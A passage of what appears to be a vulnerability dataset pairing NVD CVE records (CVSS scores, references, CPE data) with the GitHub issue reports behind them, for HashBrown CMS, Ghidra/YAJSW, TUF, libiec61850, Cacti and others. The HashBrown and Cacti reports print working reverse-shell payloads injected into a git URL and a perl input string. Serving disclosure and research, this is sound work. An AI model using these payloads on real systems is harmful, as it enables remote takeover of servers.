(/home/fuzzme/victim/libmysofa/src/mysofa2json+0x462550) in __interceptor_vsprintf Shadow bytes around the buggy address: 0x10007fdc1950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc1960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc1970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc1980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc1990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fdc19a0: 00 00 00 00 f1 f1 f1 f1 00 00[f2]f2 00 f3 f3 f3 0x10007fdc19b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc19c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc19d0: 00 00 00 00 f1 f1 f1 f1 04 f2 00 00 00 00 00 00 0x10007fdc19e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fdc19f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==6267==ABORTING ```
Stack Buffer Overflow in mysofa2json
https://api.github.com/repos/hoene/libmysofa/issues/96/comments
9
2020-01-10T09:56:42Z
2020-01-11T21:36:10Z
https://github.com/hoene/libmysofa/issues/96
547,977,105
96
1,009
CVE-2020-6948
2020-01-13T19:15:12.850
A remote code execution issue was discovered in HashBrown CMS through 1.3.3. Server/Entity/Deployer/GitDeployer.js has a Service.AppService.exec call that mishandles the URL, repository, username, and password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HashBrownCMS/hashbrown-cms/issues/326" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HashBrownCMS/hashbrown-cms/issues/326" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashbrowncms:hashbrown_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "F17E18B3-CD08-499E-B6EA-B6B26AEC76EB", "versionEndExcluding": null, "versionEndIncluding": "1.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/HashBrownCMS/hashbrown-cms/issues/326
[ "Exploit", "Third Party Advisory" ]
github.com
[ "HashBrownCMS", "hashbrown-cms" ]
In file src/Server/Entity/Deployer/GitDeployer.js: await HashBrown.Service.AppService.exec('git clone \'' + url + '\' \'' + repoPath + '\''); The url, username, password and other parameters accept value without proper security check. If I set the git url to something like "10.154.159.166/git' $(bash -c 'bash -i >& /dev/tcp/10.154.159.161/8888 0>&1' &)", then when click media to trigger gitpull I can get a reverse shell.
remote code execution vulnerability
https://api.github.com/repos/HashBrownCMS/hashbrown-cms/issues/326/comments
8
2020-01-12T08:00:45Z
2020-01-14T10:20:22Z
https://github.com/HashBrownCMS/hashbrown-cms/issues/326
548,535,998
326
1,010
CVE-2020-6949
2020-01-13T19:15:12.930
A privilege escalation issue was discovered in the postUser function in HashBrown CMS through 1.3.3. An editor user can change the password hash of an admin user's account, or otherwise reconfigure that account.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HashBrownCMS/hashbrown-cms/issues/327" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HashBrownCMS/hashbrown-cms/issues/327" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hashbrowncms:hashbrown_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "F17E18B3-CD08-499E-B6EA-B6B26AEC76EB", "versionEndExcluding": null, "versionEndIncluding": "1.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/HashBrownCMS/hashbrown-cms/issues/327
[ "Exploit", "Third Party Advisory" ]
github.com
[ "HashBrownCMS", "hashbrown-cms" ]
editor role user can change admin user's properties including password hash, salt and token. let's say you have 2 users in db id name isadmin hash 1111 admin true aaaaaa 2222 editor false bbbbbb editor user can use the postuser function to change his password. Attacker can use this function to change the id and other parameters. If editor changed the id to 1111 (post body)which belong to admin, then he can send another postuser request (set to 1111 in both post body and url) to overwrite admin's properties (since findone by id 1111 matches first row now) including hash, token and salt, also changed isadmin to false, static postUser(req, res) { let id = req.params.id; let properties = req.body; UserController.authenticate(req.cookies.token, req.params.project) .then((user) => { let hasScope = user.hasScope(req.params.project, 'users'); if(user.id == id || hasScope) { // If the current user does not have the "users" scope, revert any sensitive properties if(!hasScope) { properties.scopes = user.scopes; properties.isAdmin = false; } return Promise.resolve(); } return Promise.reject(new Error('User "' + user.name + '" does not have scope "user"')); }) .then(() => { HashBrown.Service.UserService.updateUserById(id, properties); <<<<<< accept id, and password value
vulnerability that editor user can change admin user's password
https://api.github.com/repos/HashBrownCMS/hashbrown-cms/issues/327/comments
7
2020-01-12T08:14:48Z
2020-01-13T17:02:26Z
https://github.com/HashBrownCMS/hashbrown-cms/issues/327
548,537,289
327
1,011
CVE-2020-6958
2020-01-14T00:15:11.410
An XXE vulnerability in JnlpSupport in Yet Another Java Service Wrapper (YAJSW) 12.14, as used in NSA Ghidra and other products, allows attackers to exfiltrate data from remote hosts and potentially cause denial-of-service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/issues/943" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/purpleracc00n/Exploits-and-PoC/blob/master/XXE%20in%20YAJSW%E2%80%99s%20JnlpSupport%20affects%20Ghidra%20Server.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sourceforge.net/p/yajsw/bugs/166/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NationalSecurityAgency/ghidra/issues/943" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/purpleracc00n/Exploits-and-PoC/blob/master/XXE%20in%20YAJSW%E2%80%99s%20JnlpSupport%20affects%20Ghidra%20Server.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sourceforge.net/p/yajsw/bugs/166/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yet_another_java_service_wrapper_project:yet_another_java_service_wrapper:12.14:*:*:*:*:*:*:*", "matchCriteriaId": "79AF9ACB-D0C6-4843-92AD-666753567434", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/NationalSecurityAgency/ghidra/issues/943
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NationalSecurityAgency", "ghidra" ]
**Describe the bug** XXE vulnerability in YAJSW’s JnlpSupport affects Ghidra Server. An insecure way to parse XML input was found in JnlpSupport class from Yet Another Java Service Wrapper used by Ghidra (up to latest version). **To Reproduce** Steps to reproduce the behavior: 1. Create an XXE payload file and set the extension of the file to ".jnlp" 2. Go to <path_to_ghidra>/server/ghidraSvr 3. Modify "WRAPPER_CONF" value to point to the ".jnlp" file 4. Run ghidraSvr using "$ sudo ./ghidraSvr start" 5. XXE exploit in the ".jnlp" file gets executed **Expected behavior** Extended XML Entities should be disabled. **Environment:** - OS: Kali Linux, Debian 4.19.37-2kali1 (2019-05-15) - Java Version: 11.0 - Ghidra Version: 9.0.4 **Additional context** I understand the vulnerable code is actually part of a separate library, however I considered this of interest and I suggest adding a filter so no ".jnlp" configuration files are allowed as values for "WRAPPER_CONF", at least until YAJSW patches this problem. More PoC (Available after the fix is confirmed): https://github.com/purpleracc00n/Exploits-and-PoC/blob/master/XXE%20in%20YAJSW%E2%80%99s%20JnlpSupport%20affects%20Ghidra%20Server.md
XXE Vulnerability in JnlpSupport of YAJSW affects Ghidra Server
https://api.github.com/repos/NationalSecurityAgency/ghidra/issues/943/comments
2
2019-08-27T14:21:52Z
2021-12-22T10:34:15Z
https://github.com/NationalSecurityAgency/ghidra/issues/943
485,841,948
943
1,012
CVE-2020-6173
2020-01-14T19:15:13.797
TUF (aka The Update Framework) 0.7.2 through 0.12.1 allows Uncontrolled Resource Consumption.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/tuf/commits/develop" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/tuf/issues/973" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/tuf/commits/develop" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/tuf/issues/973" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:the_update_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "A88741B4-0593-41A4-BD46-9EE4E3905DBA", "versionEndExcluding": null, "versionEndIncluding": "0.12.1", "versionStartExcluding": null, "versionStartIncluding": "0.7.2", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/theupdateframework/tuf/issues/973
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "theupdateframework", "tuf" ]
We received the report below about an attacker that can create many invalid signatures on a metadata file, delaying the moment when the client will determine the signature is not valid. This delay may be for at least a few minutes, but possibly could be longer especially if multiple files are impacted. Possible remediations include failing earlier (possibly immediately) if any signature is not valid. Credit to Erik MacLean - Analog Devices, Inc. for reporting this issue. (More Details below.) Tracking ID: CVE-2020-6173 Summary: Potential Client-side Denial of Service Description: While maximum file size is restricted for downloading, the client may attempt to validate a large number of signatures. We have been able to add over 500 copies of the same invalid signature into the `root.json` file, which results in the client attempting to validate each one, spending several minutes on validation. The file size limit of `target.json` is larger and may allow up to 5000 signatures, further increasing the amount of time spent in validation. Security Impact: Denial of Service Affected Version: Identified at commit 9fde70fbb3ba6a3385b80046559058d939833c60, suspect all versions. Credit: Erik MacLean - Analog Devices, Inc.
Potential DoS for attacker that can create metadata files...
https://api.github.com/repos/theupdateframework/python-tuf/issues/973/comments
2
2020-01-08T17:09:34Z
2020-09-10T10:46:46Z
https://github.com/theupdateframework/python-tuf/issues/973
546,990,659
973
1,013
CVE-2020-7054
2020-01-14T21:15:16.707
MmsValue_decodeMmsData in mms/iso_mms/server/mms_access_result.c in libIEC61850 through 1.4.0 has a heap-based buffer overflow when parsing the MMS_BIT_STRING data type.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/200" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:*:*:*:*:*:*:*:*", "matchCriteriaId": "9889D0B1-2E87-4FA4-A80B-AA481308ECDE", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/mz-automation/libiec61850/issues/200
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
When libiec61850 parsing type `MMS_BIT_STRING`, it doesn't check variable `bufPos`. So we can provide a larger number for `bufPos`, then memory copy from `buffer` + `bufPos` + 1 lead to heap overflow. <img width="631" alt="Screen Shot 2020-01-13 at 1 18 25 AM" src="https://user-images.githubusercontent.com/20929895/72222707-def82580-35a2-11ea-8cd1-8680c11b4d7f.png"> poc: [poc.zip](https://github.com/mz-automation/libiec61850/files/4050877/poc.zip) result: ``` gdb-peda$ r < ./poc Starting program: /home/casper/targets/struct/libiec61850/afl/fuzzrun/fuzzmmsdata < poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". ================================================================= ==24475==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000013 at pc 0x0000004a6864 bp 0x7fffffffe050 sp 0x7fffffffd800 WRITE of size 5 at 0x602000000013 thread T0 [New process 26870] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". process 26870 is executing new program: /home/casper/fuzz/fuzzdeps/llvm9/bin/llvm-symbolizer [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". #0 0x4a6863 in __asan_memcpy /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22 #1 0x7ffff791103c in MmsValue_decodeMmsData /home/casper/targets/struct/libiec61850/afl/SRC/src/mms/iso_mms/server/mms_access_result.c:231:9 #2 0x7ffff791174c in MmsValue_decodeMmsData /home/casper/targets/struct/libiec61850/afl/SRC/src/mms/iso_mms/server/mms_access_result.c:200:38 #3 0x4ebb1e in main /home/casper/targets/struct/libiec61850/afl/../fuzzsrc/fuzzmmsdata.c:12:21 #4 0x7ffff683db96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41ad59 in _start (/home/casper/targets/struct/libiec61850/afl/fuzzrun/fuzzmmsdata+0x41ad59) 0x602000000013 is located 0 bytes to the right of 3-byte region [0x602000000010,0x602000000013) allocated by thread T0 here: #0 0x4a7a98 in calloc /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:154 #1 0x7ffff7b718ed in Memory_calloc /home/casper/targets/struct/libiec61850/afl/SRC/hal/memory/lib_memory.c:59:20 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22 in __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[03]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==24475==ABORTING ```
heap overflow when parsing `MMS_BIT_STRING` in MmsValue_decodeMmsData in mms/iso_mms/server/mms_access_result.c
https://api.github.com/repos/mz-automation/libiec61850/issues/200/comments
3
2020-01-12T17:21:08Z
2020-01-15T07:07:07Z
https://github.com/mz-automation/libiec61850/issues/200
548,600,159
200
1,014
CVE-2020-7058
2020-01-15T07:15:12.927
data_input.php in Cacti 1.2.8 allows remote code execution via a crafted Input String to Data Collection -> Data Input Methods -> Unix -> Ping Host. NOTE: the vendor has stated "This is a false alarm.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3186" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*", "matchCriteriaId": "2D05824B-4E66-44CA-A862-0DDDB23C8C88", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/Cacti/cacti/issues/3186
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** Input validation error in data_input.php leads to Remote Code Execution via Input String (Script/Command) edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using Script/Command input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server. Cacti version: Latest (1.2.8) **To Reproduce** Steps to reproduce the behavior: 1. After logged in, navigate to Data Collection -> Data Input Methods -> Unix - Ping Host 2. By default, Input String was specified as: `perl <path_cacti>/scripts/ping.pl <hostname>`. Let's append a malicious perl script in front of current script: `perl -e 'use Socket;$i="**ACTTACKER-IP**";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; perl <path_cacti>/scripts/ping.pl <hostname>` 3. By default, Unix -Ping Host data input method is being used by Unix - Ping Latency Graph template. This means we can create Unix - Ping Latency in current device and gain Remote Code Execution **Expected behavior** - By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first. **Impact** - The vulnerability would let an authorized user take control of the server. Attack will then be able to take down the system as well as use the system for malicious purposes. **Screenshots** If applicable, add screenshots to help explain your problem. - Malicious code: https://imgur.com/icaFTHk - Create new graph in device: https://imgur.com/C8zF3Py - Reverse shell connection: https://imgur.com/97HgO0g **Desktop (please complete the following information):** - OS: Kali Linux, Ubuntu - Browser : Firefox, Chrome - Version: Firefox 72.0, Chrome 79.0.3945.117 **Remediation** - I would think about two (2) solutions: 1 - Using regex to catch all other strings different from expected string 2 - Hard-coding perl script into source-code and force the application to take only 1 filtered input (hostname). Chi Tran research@ctrsec.io
Critical vulnerability: Remote Code Execution via string/command type Input String
https://api.github.com/repos/Cacti/cacti/issues/3186/comments
19
2020-01-14T22:53:20Z
2020-08-23T00:04:30Z
https://github.com/Cacti/cacti/issues/3186
549,865,124
3,186
1,015
CVE-2020-7105
2020-01-16T04:15:11.617
async.c and dict.c in libhiredis.a in hiredis through 0.14.0 allow a NULL pointer dereference because malloc return values are unchecked.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/redis/hiredis/issues/747" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00028.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76ZDGWBV3YEEQ2YC65ZJEQLKQFVFBZHX/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKOTCIYFEWJJILUGL4JQ3CJAM3TWYZ2A/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/redis/hiredis/issues/747" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00028.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76ZDGWBV3YEEQ2YC65ZJEQLKQFVFBZHX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKOTCIYFEWJJILUGL4JQ3CJAM3TWYZ2A/" } ]
